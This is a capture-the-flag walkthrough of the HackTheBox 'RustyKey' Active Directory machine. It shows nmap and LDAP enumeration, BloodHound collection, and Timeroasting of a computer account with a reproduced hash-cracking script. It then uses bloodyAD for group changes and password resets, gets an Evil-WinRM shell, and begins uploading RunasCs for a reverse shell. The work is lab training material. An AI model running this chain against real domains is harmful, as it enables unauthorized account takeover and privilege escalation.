Week 7 : [ENG] RustyKey - Hard

Release Date : 02:00 29/06/2025 (GMT +7)

Completed : 07:xx 30/06/2025 (GMT +7)

The full write-up will be made public after Season 8 ends to

ensure transparency with HackTheBox policies. Please read
carefully before commenting, I’m not responsible for any
issues that arise.

Introduction
Welcome to this detailed walkthrough of the RustyKey machine from Hack The
Box Season 8. This high-difficulty Windows-based Active Directory challenge
immerses you in a realistic penetration testing scenario, emphasizing identity-
based access and misconfiguration exploitation. We'll dive into enumerating
critical attack surfaces, leveraging valid credentials, and navigating complex
privilege escalation paths to achieve full system compromise.

Report Content Characteristics

Week 7 : [ENG] RustyKey - Hard 1

 I have explained in detail every task I performed in each
step, accompanied by screenshots and the exploits used.
Initial Enumeration

Open 10.10.xx.xx:3268
Open 10.10.xx.xx:3269
Open 10.10.xx.xx:5985
Open 10.10.xx.xx:9389
Open 10.10.xx.xx:47001
Open 10.10.xx.xx:49664
Open 10.10.xx.xx:49665
Open 10.10.xx.xx:49667
Open 10.10.xx.xx:49666
Open 10.10.xx.xx:49669
Open 10.10.xx.xx:49671
Open 10.10.xx.xx:49670
Open 10.10.xx.xx:49672
Open 10.10.xx.xx:49673
Open 10.10.xx.xx:49676
Open 10.10.xx.xx:49692
Open 10.10.xx.xx:49739
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A -Pn" on i
p 10.10.xx.xx
Depending on the complexity of the script, results may take some time to a
ppear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-01 00:59 +08
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed

Week 7 : [ENG] RustyKey - Hard 2

 NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
Initiating SYN Stealth Scan at 00:59
Scanning rustykey.htb (10.10.xx.xx) [17 ports]
Discovered open port 3268/tcp on 10.10.xx.xx
Discovered open port 49671/tcp on 10.10.xx.xx
Discovered open port 49665/tcp on 10.10.xx.xx
Discovered open port 9389/tcp on 10.10.xx.xx
Discovered open port 49673/tcp on 10.10.xx.xx
Discovered open port 49739/tcp on 10.10.xx.xx
Discovered open port 5985/tcp on 10.10.xx.xx
Discovered open port 49670/tcp on 10.10.xx.xx
Discovered open port 49676/tcp on 10.10.xx.xx
Discovered open port 49667/tcp on 10.10.xx.xx
Discovered open port 49692/tcp on 10.10.xx.xx
Discovered open port 49666/tcp on 10.10.xx.xx
Discovered open port 49672/tcp on 10.10.xx.xx
Discovered open port 47001/tcp on 10.10.xx.xx
Discovered open port 49664/tcp on 10.10.xx.xx
Discovered open port 49669/tcp on 10.10.xx.xx
Discovered open port 3269/tcp on 10.10.xx.xx
Completed SYN Stealth Scan at 00:59, 0.54s elapsed (17 total ports)
Initiating Service scan at 00:59
Scanning 17 services on rustykey.htb (10.10.xx.xx)
Service scan Timing: About 41.18% done; ETC: 01:07 (0:04:24 remaining)
Completed Service scan at 01:02, 184.90s elapsed (17 services on 1 host)
Initiating OS detection (try #1) against rustykey.htb (10.10.xx.xx)
Retrying OS detection (try #2) against rustykey.htb (10.10.xx.xx)
Initiating Traceroute at 01:03
Completed Traceroute at 01:03, 1.69s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:03
Completed Parallel DNS resolution of 1 host. at 01:03, 14.22s elapsed
DNS resolution of 1 IPs took 14.22s. Mode: Async [#: 1, OK: 0, NX: 0, DR: 1,
SF: 0, TR: 3, CN: 0]
NSE: Script scanning 10.10.xx.xx.

Week 7 : [ENG] RustyKey - Hard 3

 NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:03
NSE Timing: About 99.11% done; ETC: 01:04 (0:00:00 remaining)
NSE Timing: About 99.28% done; ETC: 01:04 (0:00:00 remaining)
NSE Timing: About 99.58% done; ETC: 01:05 (0:00:00 remaining)
NSE Timing: About 99.62% done; ETC: 01:05 (0:00:00 remaining)
NSE Timing: About 99.92% done; ETC: 01:06 (0:00:00 remaining)
Completed NSE at 01:06, 151.72s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 9.27s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 0.00s elapsed
Nmap scan report for rustykey.htb (10.10.xx.xx)
Host is up, received user-set (0.33s latency).
Scanned at 2025-07-01 00:59:51 +08 for 391s

PORT STATE SERVICE REASON VERSION

3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Director
y LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSD
P/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSD
P/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127

Week 7 : [ENG] RustyKey - Hard 4

 49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over
HTTP 1.0
49671/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
49673/tcp open unknown syn-ack ttl 127
49676/tcp open unknown syn-ack ttl 127
49692/tcp open unknown syn-ack ttl 127
49739/tcp open unknown syn-ack ttl 127
Warning: OSScan results may be unreliable because we could not find at le
ast 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results inco
mplete
Aggressive OS guesses: Microsoft Windows Server 2016 (95%), Microsoft
Windows Server 2019 (95%), Microsoft Windows Server 2012 (95%), Wind
ows Server 2019 (95%), Microsoft Windows Server 2022 (95%), Microsoft
Windows Vista SP1 (95%), Microsoft Windows Server 2012 or 2012 R2 (9
3%), Microsoft Windows 10 (92%), Microsoft Windows 10 1703 or Window
s 11 21H2 (92%), Microsoft Windows 10 1709 - 21H2 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=7/1%OT=3268%CT=%CU=35382%PV=Y%DS=
2%DC=T%G=N%TM=6862C40E%P=x86_64-pc-linux-gnu)
SEQ(CI=I)
SEQ(SP=F8%GCD=1%ISR=104%TI=RD%CI=RD%TS=U)
OPS(O1=M542NW8NNS%O2=M542NW8NNS%O3=M542NW8%O4=M54
2NW8NNS%O5=M542NW8NNS%O6=M542NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M542NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU

Week 7 : [ENG] RustyKey - Hard 5

 CK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops

TCP Sequence Prediction: Difficulty=248 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 3268/tcp)

HOP RTT ADDRESS
1 671.31 ms 10.10.16.1
2 671.62 ms rustykey.htb (10.10.xx.xx)

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:06
Completed NSE at 01:06, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 392.16 seconds
Raw packets sent: 179 (13.574KB) | Rcvd: 1380 (59.698KB)

10.10.xx.xx rustykey.htb dc.rustykey.htb

Week 7 : [ENG] RustyKey - Hard 6

 📢 KRB5 Configure

[libdefaults]
default_realm = RUSTYKEY.HTB
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false
dns_lookup_realm = false
dns_lookup_kdc = true
k5login_authoritative = false
[realms]
RUSTYKEY.HTB = {
kdc = rustykey.htb
admin_server = rustykey.htb
default_admin = rustykey.htb
}
[domain_realm]
.rustykey.htb = RUSTYKEY.HTB

1. Users Enumeration

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# ldapsearch -x -H ldap://10.10.xx.xx -D '[email protected]' -w '8#
t5HE8L!W3A' -b 'dc=rustykey,dc=htb' "(objectClass=user)" userPrincipalN
ame
# extended LDIF
#
# LDAPv3
# base <dc=rustykey,dc=htb> with scope subtree
# filter: (objectClass=user)
# requesting: userPrincipalName

Week 7 : [ENG] RustyKey - Hard 7

 #

# Administrator, Users, rustykey.htb

dn: CN=Administrator,CN=Users,DC=rustykey,DC=htb

# Guest, Users, rustykey.htb

dn: CN=Guest,CN=Users,DC=rustykey,DC=htb

# DC, Domain Controllers, rustykey.htb

dn: CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb

# krbtgt, Users, rustykey.htb

dn: CN=krbtgt,CN=Users,DC=rustykey,DC=htb

# Support-Computer1, Computers, Support, rustykey.htb

dn: CN=Support-Computer1,OU=Computers,OU=Support,DC=rustykey,DC
=htb

# Support-Computer2, Computers, Support, rustykey.htb

dn: CN=Support-Computer2,OU=Computers,OU=Support,DC=rustykey,DC
=htb

# Support-Computer3, Computers, Support, rustykey.htb

dn: CN=Support-Computer3,OU=Computers,OU=Support,DC=rustykey,DC
=htb

# Support-Computer4, Computers, Support, rustykey.htb

dn: CN=Support-Computer4,OU=Computers,OU=Support,DC=rustykey,DC
=htb

# Support-Computer5, Computers, Support, rustykey.htb

dn: CN=Support-Computer5,OU=Computers,OU=Support,DC=rustykey,DC
=htb

# Finance-Computer1, Computers, Finance, rustykey.htb

dn: CN=Finance-Computer1,OU=Computers,OU=Finance,DC=rustykey,DC

Week 7 : [ENG] RustyKey - Hard 8

 =htb

# Finance-Computer2, Computers, Finance, rustykey.htb

dn: CN=Finance-Computer2,OU=Computers,OU=Finance,DC=rustykey,DC
=htb

# Finance-Computer3, Computers, Finance, rustykey.htb

dn: CN=Finance-Computer3,OU=Computers,OU=Finance,DC=rustykey,DC
=htb

# Finance-Computer4, Computers, Finance, rustykey.htb

dn: CN=Finance-Computer4,OU=Computers,OU=Finance,DC=rustykey,DC
=htb

# Finance-Computer5, Computers, Finance, rustykey.htb

dn: CN=Finance-Computer5,OU=Computers,OU=Finance,DC=rustykey,DC
=htb

# IT-Computer1, Computers, IT, rustykey.htb

dn: CN=IT-Computer1,OU=Computers,OU=IT,DC=rustykey,DC=htb

# IT-Computer2, Computers, IT, rustykey.htb

dn: CN=IT-Computer2,OU=Computers,OU=IT,DC=rustykey,DC=htb

# IT-Computer3, Computers, IT, rustykey.htb

dn: CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb

# IT-Computer4, Computers, IT, rustykey.htb

dn: CN=IT-Computer4,OU=Computers,OU=IT,DC=rustykey,DC=htb

# IT-Computer5, Computers, IT, rustykey.htb

dn: CN=IT-Computer5,OU=Computers,OU=IT,DC=rustykey,DC=htb

# rr.parker, Users, rustykey.htb

dn: CN=rr.parker,CN=Users,DC=rustykey,DC=htb
userPrincipalName: [email protected]

Week 7 : [ENG] RustyKey - Hard 9

 # mm.turner, Users, rustykey.htb
dn: CN=mm.turner,CN=Users,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# bb.morgan, Users, IT, rustykey.htb

dn: CN=bb.morgan,OU=Users,OU=IT,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# gg.anderson, Users, IT, rustykey.htb

dn: CN=gg.anderson,OU=Users,OU=IT,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# dd.ali, Users, Finance, rustykey.htb

dn: CN=dd.ali,OU=Users,OU=Finance,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# ee.reed, Users, Support, rustykey.htb

dn: CN=ee.reed,OU=Users,OU=Support,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# nn.marcos, Users, rustykey.htb

dn: CN=nn.marcos,CN=Users,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# backupadmin, Users, rustykey.htb

dn: CN=backupadmin,CN=Users,DC=rustykey,DC=htb
userPrincipalName: [email protected]

# search reference
ref: ldap://ForestDnsZones.rustykey.htb/DC=ForestDnsZones,DC=rustyke
y,DC=htb

# search reference
ref: ldap://DomainDnsZones.rustykey.htb/DC=DomainDnsZones,DC=rusty
key,DC=htb

Week 7 : [ENG] RustyKey - Hard 10

 # search reference
ref: ldap://rustykey.htb/CN=Configuration,DC=rustykey,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 31
# numEntries: 27
# numReferences: 3

2. Bloodhound Enumeration

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# impacket-getTGT -dc-ip 10.10.xx.xx rustykey.htb/rr.parker:'8#t5HE8L!
W3A'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in rr.parker.ccache

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# export KRB5CCNAME=rr.parker.ccache

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# klist
Ticket cache: FILE:rr.parker.ccache
Default principal: [email protected]

Valid starting Expires Service principal

06/30/2025 03:35:01 06/30/2025 13:35:01 krbtgt/RUSTYKEY.HTB@RUST
YKEY.HTB
renew until 07/01/2025 03:34:29

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# bloodhound-python -u 'rr.parker' -p '8#t5HEL!W3A' -c All -d rustyke

Week 7 : [ENG] RustyKey - Hard 11

 y.htb -ns 10.10.xx.xx --zip -k
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: rustykey.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.rustykey.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 16 computers
INFO: Connecting to LDAP server: dc.rustykey.htb
INFO: Found 12 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 10 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: dc.rustykey.htb
INFO: Done in 00M 26S
INFO: Compressing output into 20250630033519_bloodhound.zip

Week 7 : [ENG] RustyKey - Hard 12

 The computer ACC IT_COMPUTER3 can add itself to the HELPDESK GROUP

The HELPDESK group can change the password of the following four users

bb.morgan

gg.anderson

dd.ali

ee.reed

Week 7 : [ENG] RustyKey - Hard 13

 MM.TURNER has AddAlowedToAct rights on DC.RUSTKEY.HTB

Week 7 : [ENG] RustyKey - Hard 14

 These 3 users can connect via Evil-WinRM

bb.morgan

gg.anderson

ee.reed

Week 7 : [ENG] RustyKey - Hard 15

 3. Timeroasting Of IT-COMPUTER3$ With Timeroast

Timeroasting takes advantage of Windows' NTP

authentication mechanism, allowing unauthenticated

Week 7 : [ENG] RustyKey - Hard 16

 attackers to effectively request a password hash of any
computer or trust account by sending an NTP request with
that account's RID. This is not a problem when computer
accounts are properly generated, but if a non-standard or
legacy default password is set this tool allows you to brute-
force those offline.

https://github.com/SecuraBV/Timeroast

First, we should be git clone Timeroast via link on top here & re-edit timecrack.py .

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# git clone https://github.com/SecuraBV/Timeroast.git
Cloning into 'Timeroast'...
remote: Enumerating objects: 91, done.
remote: Counting objects: 100% (91/91), done.
remote: Compressing objects: 100% (54/54), done.
remote: Total 91 (delta 46), reused 73 (delta 35), pack-reused 0 (from 0)
Receiving objects: 100% (91/91), 246.55 KiB | 1.10 MiB/s, done.
Resolving deltas: 100% (46/46), done.

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# ll
total 220
-rw-rw-r-- 1 root root 209916 Jun 30 03:35 20250630033519_bloodhoun
d.zip
-rw-rw-r-- 1 root root 1976 Jun 30 03:06 internal.pdf
-rw-rw-r-- 1 root root 1375 Jun 30 03:34 rr.parker.ccache
drwxrwxr-x 4 root root 4096 Jun 30 03:37 Timeroast

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# ls Timeroast

Week 7 : [ENG] RustyKey - Hard 17

 extra-scripts LICENSE README.md timeroast.ps1 timeroast.py

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# ls Timeroast/extra-scripts
kirbi_to_hashcat.py md4.py timecrack.py
㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# nano Timeroast/extra-scripts/timecrack.py

Week 7 : [ENG] RustyKey - Hard 18

 📢 The script timecrack.py when after edited like this:

#!/usr/bin/env python3
"""Perform a simple dictionary attack against the output of timero
ast.py. Necessary because
the NTP 'hash' format unfortunately does not fit into Hashcat or J
ohn right now.
Not even remotely optimized, but still useful for cracking legacy d
efault passwords (where the
password is the computer name) or specific default passwords th
at are popular in an organisation.
"""
from binascii import hexlify, unhexlify
from argparse import ArgumentParser, FileType, RawDescription
HelpFormatter
from typing import TextIO, Generator, Tuple
import hashlib, sys, re

HASH_FORMAT = r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9
a-f]{32})\$(?P<salt>[0-9a-f]{96})$'

def md4(data: bytes) -> bytes:

try:
return hashlib.new('md4', data).digest()
except ValueError:
from md4 import MD4 # Fallback to pure Python if OpenSSL
has no MD4
return MD4(data).bytes()

def compute_hash(password: str, salt: bytes) -> bytes:

"""Compute a legacy NTP authenticator 'hash'.
"""
return hashlib.md5(md4(password.encode('utf-16le')) + salt).di
gest()

Week 7 : [ENG] RustyKey - Hard 19

 def try_crack(hashfile: TextIO, dictfile: TextIO) -> Generator[Tuple
[int, str], None, None]:
hashes = []
for line in hashfile:
line = line.strip()
if line:
m = re.match(HASH_FORMAT, line)
if not m:
print(f'ERROR: invalid hash format: {line}', file=sys.stder
r)
sys.exit(1)
rid, hashval, salt = m.group('rid', 'hashval', 'salt')
hashes.append((int(rid), unhexlify(hashval), unhexlify(sal
t)))

for password in dictfile:

password = password.strip()
for rid, hashval, salt in hashes:
if compute_hash(password, salt) == hashval:
yield rid, password

def main():
argparser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
description="""Perform a simple dictionary attack against th
e output of timeroast.py.
Not even remotely optimized, but still useful for cracking legacy d
efault
passwords (where the password is the computer name) or specifi
c default
passwords that are popular in an organisation.
"""
)
argparser.add_argument('hashes', type=FileType('r'), help='Ou
tput of timeroast.py')
argparser.add_argument('dictionary', type=lambda f: open(f, e

Week 7 : [ENG] RustyKey - Hard 20

 ncoding='latin-1'),
help='Line-delimited password dictionary (e.g. ro
ckyou.txt)')
args = argparser.parse_args()

crackcount = 0
for rid, password in try_crack(args.hashes, args.dictionary):
print(f'[+] Cracked RID {rid} password: {password}')
crackcount += 1
print(f'\n{crackcount} passwords recovered.')

if __name__ == '__main__':
main()

Use these command as an alternative & cracking the hashes

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# python3 Timeroast/timeroast.py 10.10.xx.xx -o rustykey.hashes

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# python3 Timeroast/extra-scripts/timecrack.py rustykey.hashes /usr/s
hare/wordlists/rockyou.txt
[+] Cracked RID 1125 password: Rusty88!

1 passwords recovered.

In Bloodhound we see that RID 1125 belongs to IT_COMPUTER3 !!!

Week 7 : [ENG] RustyKey - Hard 21

 Cat rustykey.hashes , we will see these hashes of IT_COMPUTER3 , so we don’t need
alternative be MiTM via NetExec, or any relevant.

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# cat rustykey.hashes
1000:$sntp-ms$5d90c9e89b8f8d5a0b82ecaaab347d52$1c0111e9000000
00000a01684c4f434cec0c132e2faf0e75e1b8428bffbfcd0aec0c15097bb7
2d28ec0c15097bb74800
1103:$sntp-ms$a209ac58be832560657dec3ad35a88fc$1c0111e9000000
00000a01694c4f434cec0c132e30d77b7ce1b8428bffbfcd0aec0c150b08e
7ceb0ec0c150b08e7e7db
1104:$sntp-ms$437a140d5025f0a27329bdbd111c0e42$1c0111e90000000
0000a01694c4f434cec0c132e30e7c7fae1b8428bffbfcd0aec0c150b08f81
981ec0c150b08f83607
1106:$sntp-ms$6f4508144a95e1c31992a982b3327ca4$1c0111e90000000
0000a01694c4f434cec0c132e2eec1ea1e1b8428bffbfcd0aec0c150b13049
c46ec0c150b1304bf82

Week 7 : [ENG] RustyKey - Hard 22

 1105:$sntp-ms$5858567bf29263ad4c7872f8bfbbe935$1c0111e90000000
0000a01694c4f434cec0c132e2edd814fe1b8428bffbfcd0aec0c150b12f5e4
1dec0c150b12f628e6
1107:$sntp-ms$fa159daab04d68639fca8c72ef9cf041$1c0111e900000000
000a01694c4f434cec0c132e2d7cef3ee1b8428bffbfcd0aec0c150b1d9d90
9fec0c150b1d9dc64f
1120:$sntp-ms$6b0fd27716d2d889945087c38950e4df$1c0111e90000000
0000a01694c4f434cec0c132e311332e2e1b8428bffbfcd0aec0c150b49238
10eec0c150b4923a0ee
1121:$sntp-ms$584d005fbb9dce285d1f24439e163998$1c0111e90000000
0000a01694c4f434cec0c132e3118faa2e1b8428bffbfcd0aec0c150b49294
573ec0c150b49296701
1122:$sntp-ms$b6b16af229a56a62d9c15ce51ce3b1e6$1c0111e900000000
000a01694c4f434cec0c132e312c94b3e1b8428bffbfcd0aec0c150b493ce1
31ec0c150b493d02bf
1118:$sntp-ms$270fe340ebd1a0891d11629fb2cc45f8$1c0111e900000000
000a01694c4f434cec0c132e30f7c74ce1b8428bffbfcd0aec0c150b4907ed
34ec0c150b49084117
1119:$sntp-ms$cfbdb42f53f67c8361e31aa15f04e6de$1c0111e9000000000
00a01694c4f434cec0c132e30f88ef2e1b8428bffbfcd0aec0c150b4908d4b
aec0c150b4908fcfe
1123:$sntp-ms$d7eef5b89e337f886bc5fb116c3df75d$1c0111e900000000
000a01694c4f434cec0c132e2d7a7008e1b8428bffbfcd0aec0c150b4d7a6
0efec0c150b4d7a786c
1125:$sntp-ms$6ed8ea2bc7d6b059efe9bfd731e359bb$1c0111e90000000
0000a01694c4f434cec0c132e2da76386e1b8428bffbfcd0aec0c150b59af7
b83ec0c150b59af9ebe
1126:$sntp-ms$a0da3098be67818b4af8d8b79bc0e13b$1c0111e90000000
0000a01694c4f434cec0c132e2dc26718e1b8428bffbfcd0aec0c150b59ca8
41dec0c150b59caa5ab
1124:$sntp-ms$12a5e1656d66ac346a61f3b10c3d80a8$1c0111e90000000
0000a01694c4f434cec0c132e2da6322ee1b8428bffbfcd0aec0c150b59ae
2da5ec0c150b59ae75c9
1127:$sntp-ms$4bb2d668db128370a780f854e50d1aae$1c0111e90000000

Week 7 : [ENG] RustyKey - Hard 23

 0000a01694c4f434cec0c132e2dc55000e1b8428bffbfcd0aec0c150b59cd
64a2ec0c150b59cd8b38

4. Exploit Chain

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# ntpdate -u 10.10.xx.xx
2025-07-01 00:13:07.685429 (+0800) +6.425222 +/- 0.055239 10.10.xx.xx
s1 no-leap
CLOCK: time stepped by 6.425222

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3
$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HELPDESK

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3
$' -p 'Rusty88!' -k set password BB.MORGAN 'P@ssword123'
[+] Password changed successfully!

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3
$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'
[-] IT removed from PROTECTED OBJECTS

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN:P@ssword123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in BB.MORGAN.ccache

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# export KRB5CCNAME=BB.MORGAN.ccache

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
Week 7 : [ENG] RustyKey - Hard 24
 └─# evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undef

ined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/

Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> dir

Directory: C:\Users\bb.morgan\Desktop

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 6/29/2025 12:32 PM 34 user.txt

*Evil-WinRM* PS C:\Users\bb.morgan\Desktop>

5. Initial From PDF File

In bb.morgan , we find a .pdf file in Desktop directory

*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> download internal.pdf

Info: Downloading C:\Users\bb.morgan\Desktop\internal.pdf to internal.pdf

Info: Download successful!

Week 7 : [ENG] RustyKey - Hard 25

 The document describes that the Support Group temporarily receives extended
rights such as access to Registry Keys …etc (it is not entirely clear what is meant).

In the first, should be following step by step right here :

Remove SUPPORT from the protected objects ( ee.reed is a member of the

SUPPORT group)

Set a new password for the user ee.reed .

Go into ee.reed with WinRM session

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --kerberos --dc-ip 10.10.xx.xx --host dc.rustykey.htb -d rus
tykey.htb -u IT-COMPUTER3$ -p 'Rusty88!' remove groupMember "CN=P
ROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB" "SUPPORT"
[-] SUPPORT removed from CN=PROTECTED OBJECTS,CN=USERS,DC=R
USTYKEY,DC=HTB

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-CO
MPUTER3$' -p 'Rusty88!' set password ee.reed 'P@ssword123'
[+] Password changed successfully!

Week 7 : [ENG] RustyKey - Hard 26

 ┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# evil-winrm -i dc.rustykey.htb -u ee.reed -r rustykey.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undef

ined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/

Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init

_sec_context did not return GSS_S_COMPLETE: No credentials were suppli
ed, or the credentials were unavailable or inaccessible
No Kerberos credentials available (default cache: IT-COMPUTER3$.ccach
e)

Error: Exiting with code 1

🚨 Since we cannot build

RunasCs.exe
Evil-WinRM shell to
via our existing shell with
EE.REED

BB.MORGAN .
, we have to use

6. Access Into ee.reed With RunasCs

We create the directory for our tools on the target system & upload RunasCs.exe
to the target. After that, we use RunasCs for a reverse shell with the privileges
of ee.reed

Week 7 : [ENG] RustyKey - Hard 27

 *Evil-WinRM* PS C:\Users\bb.morgan\Desktop> cd /
*Evil-WinRM* PS C:\> mkdir Tools

Directory: C:\

Mode LastWriteTime Length Name

---- ------------- ------ ----
d----- 6/30/2025 10:06 AM Tools

*Evil-WinRM* PS C:\> cd Tools

*Evil-WinRM* PS C:\Tools> upload RunasCs.exe

